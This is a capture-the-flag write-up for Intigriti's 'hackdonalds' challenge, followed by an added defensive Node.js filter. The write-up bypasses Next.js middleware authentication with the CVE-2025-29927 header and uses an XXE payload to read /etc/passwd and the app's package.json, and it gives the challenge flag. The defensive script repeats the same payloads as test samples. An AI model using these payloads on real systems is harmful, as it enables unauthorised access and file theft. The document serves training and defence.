| Title | hackdonalds |
|---|---|
| Description | Find the FLAG and win Intigriti swag! 🏆 |
| Difficulty | Easy |
| Maker | Bastien + CryptoCat |
Solution
I was browsing the web application and checked all the endpoints listed in the buildManifest file.
There is an /admin page. Upon visiting it, I am redirected to the /login page. Next.js, however, is affected by CVE-2025-29927, which bypasses the middleware-based authentication. Let's add the `X-Middleware-Subrequest: middleware` header and send the request again.
We can see the admin dashboard now! Hovering over all the links shows that the ice cream machines link is the only one that works. This is what the ice cream machines tab looks like.
When we view a machine's settings and click "parse settings", we can see the request body is XML, so let's try an XML external entity (XXE) injection to read /etc/passwd. The payload is:

```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<machine>
 <id>&test;</id>
 <name>Ice Cream Machine</name>
 <temperature>-18</temperature>
 <mixLevel>75</mixLevel>
 <lastMaintenance>2025-03-15</lastMaintenance>
 <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```
In a modern Next.js application the source lives in the app/ folder, so we read package.json via `file://app/package.json` and get our flag!
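As an added example that is not part of this writeup or the challenge, the following Node.js script shows the two defensive checks that close the holes used above: rejecting an externally supplied X-Middleware-Subrequest header at the edge (the documented mitigation for CVE-2025-29927 when patching is not immediately possible) and refusing XML settings bodies that declare a DOCTYPE or ENTITY before they reach the parser. The request objects are constructed samples, not captured traffic.

```javascript
// Added example (not code from the challenge or this writeup): two edge-side
// checks a defender could place in front of a Next.js app. Samples are constructed.

// CVE-2025-29927: X-Middleware-Subrequest is an internal Next.js header that
// tells the server a request came from middleware itself. An external client
// must never be allowed to supply it, so the edge/proxy should drop or reject it.
function hasExternalSubrequestHeader(headers) {
  return Object.keys(headers).some(
    (name) => name.toLowerCase() === 'x-middleware-subrequest'
  );
}

// XXE: the machine settings schema (<machine>, <id>, <name>, ...) never needs a
// DOCTYPE, so any DOCTYPE or ENTITY declaration in the body is rejected before
// it reaches an XML parser that might resolve external entities such as file:///.
function declaresDoctypeOrEntity(xmlBody) {
  return /<!DOCTYPE\b|<!ENTITY\b/i.test(xmlBody);
}

// Combined screen: returns a decision plus the reason, suitable for logging/alerting.
function screenRequest(req) {
  const headers = req.headers || {};
  if (hasExternalSubrequestHeader(headers)) {
    return { allow: false, reason: 'external x-middleware-subrequest header' };
  }
  const ctype = Object.entries(headers).find(
    ([k]) => k.toLowerCase() === 'content-type'
  );
  const isXml = ctype ? /xml/i.test(ctype[1]) : false;
  if (isXml && declaresDoctypeOrEntity(req.body || '')) {
    return { allow: false, reason: 'xml body declares DOCTYPE/ENTITY' };
  }
  return { allow: true, reason: 'ok' };
}

// Constructed sample traffic.
const normalSettings = {
  headers: { 'Content-Type': 'application/xml' },
  body: '<?xml version="1.0"?><machine><id>1</id><name>Ice Cream Machine</name></machine>',
};
const adminBypassAttempt = {
  headers: { 'X-Middleware-Subrequest': 'middleware' },
  body: '',
};
const xxeAttempt = {
  headers: { 'content-type': 'text/xml' },
  body: '<!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><machine><id>&test;</id></machine>',
};
console.log(screenRequest(normalSettings), screenRequest(adminBypassAttempt), screenRequest(xxeAttempt));
```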
Flag
INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}